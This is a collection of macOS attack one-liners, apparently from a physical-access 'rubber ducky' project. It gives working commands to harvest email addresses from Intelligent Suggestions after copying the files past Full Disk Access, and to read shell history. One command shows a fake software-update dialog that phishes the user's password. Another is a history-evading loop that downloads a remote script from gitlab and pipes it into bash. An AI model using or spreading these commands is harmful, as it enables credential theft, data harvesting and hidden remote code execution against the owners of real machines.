# Sample One-Liners for OSX
As of Wednesday, September 9, 2020 I have tested all of these commands with OSX 10.15. In cases where Z shell differs from the traditional Bash, both commands are included.

## OSX Intelligent Suggestions

**Copy Intelligent Suggestions to a Directory Which Isn't Blocked By Full Disk Access:** _(NOTE: This is required for systems running Mojave or later.)_
`osascript -e "tell application \"Finder\"" -e "set source_folder to folder (\"/Users/$LOGNAME/Library/Metadata/com.apple.IntelligentSuggestions\" as POSIX file)" -e "set destination_folder to make new folder at (\"/Users/$LOGNAME\" as POSIX file) with properties {name:\"cpytmp\"}" -e "set the_files to (files of source_folder)" -e "repeat with this_file in the_files" -e "duplicate this_file to destination_folder" -e "end repeat" -e "end tell"`

**Email Addresses From Intelligent Suggestions:**
* For OSX 10.13 and earlier: `grep -r '@' ~/Library/Metadata/com.apple.IntelligentSuggestions | sed "s/\/Users\/${LOGNAME}\/Library\/Metadata\/com.apple.IntelligentSuggestions\/[0-9]\{1,4\}.vcf:EMAIL;type=INTERNET\(;type=pref\)\{0,1\}://g"`
* For OSX 10.14 and later _(NOTE: use the first command above to copy the files to an unrestricted location)_: `grep -r '@' ~/cpytmp | sed "s/\/Users\/${LOGNAME}\/Library\/Metadata\/com.apple.IntelligentSuggestions\/[0-9]\{1,4\}.vcf:EMAIL;type=INTERNET\(;type=pref\)\{0,1\}://g"`

## Shell History
* **Bash:** `cat ~/.bash_history`
* **Zshell:** `cat ~/.zsh_history`

## Bash Sessions
`cat ~/.bash_sessions/*`

## Prompt User for Password
`PASSWORDREQ="$(osascript -e 'display dialog "A critical software update is ready to install. Please enter your password to allow this." with icon file (("Macintosh HD:System:Library:CoreServices:Install in Progress.app:Contents:Resources:") & "Installer.icns") default answer "" buttons {"Cancel", "Install Update"} default button 2 with hidden answer')"; echo $PASSWORDREQ | sed 's/button returned:Install Update, text returned://g';`

## Trolling URLs
* `open https://www.google.com/search?q=how+to+deal+with+annoying+coworkers`
* `open https://www.google.com/search?q=how+to+sleep+on+the+job+and+not+get+caught`

## Crank the Volume Up
`osascript -e "set Volume 10"`

## "Proof of Pwnership"
`say -v Daniel "Hello. I would like to take a moment to let you know that a very cheeky hacker has just taken control of your laptop (i.e. me) using a usb dongle and Amazon A-W-S. This is due to the fact that you left me unlocked and unattended... probably not something that I would have done but who am I to judge; I'm only a computer. Anyway, that cheeky hacker is probably going through all of your emails, documents and secret keys as we speak... or they would be doing that if this wasn't a simple demonstration. Next time, please remember to lock me when you walk away. Cheers."`

## Shutdown the System
`SHUTDOWN="$(osascript -e 'tell application "System Events" to shut down')"`

## Attempt to download an execute a remote script, disown process and exit terminal. Also attempts to keep the command out of the shell's history
`unset HISTFILE && bash -c 'unset HISTFILE && while true; do curl -s https://gitlab.com/Z2gwNTcK/poorMansRubberDucky/-/raw/master/sample-payload.sh | bash; sleep 2; done'& disown && exit`